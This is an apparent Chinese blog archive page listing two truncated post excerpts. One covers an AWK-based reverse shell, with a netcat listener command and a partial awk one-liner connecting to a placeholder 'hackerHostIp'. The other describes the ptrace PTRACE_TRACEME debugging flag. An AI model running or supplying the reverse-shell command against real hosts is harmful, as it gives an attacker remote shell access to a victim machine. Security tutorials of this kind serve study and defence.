02 2021 档案
摘要:反弹shell 一、基于AWK hacker机器上执行命令: nc -l Port hacker机器一直监听某端口。 在受害主机上执行命令: awk 'BEGIN {s = "/inet/tcp/0/hackerHostIp/Port"; while(42) { do{ printf "shell>
阅读全文
摘要:一、通过设置调试标志,PTRACE_TRACEME 使用PTRACE_TRACEME作为第一个参数调用ptrace函数,表示该进程由父进程跟踪。任何信号(除了SIGKILL),不管是从外来的还是由exec系统调用产生的,都将使得子进程被暂停,由父进程决定子进程的行为。在request为PTRACE_
阅读全文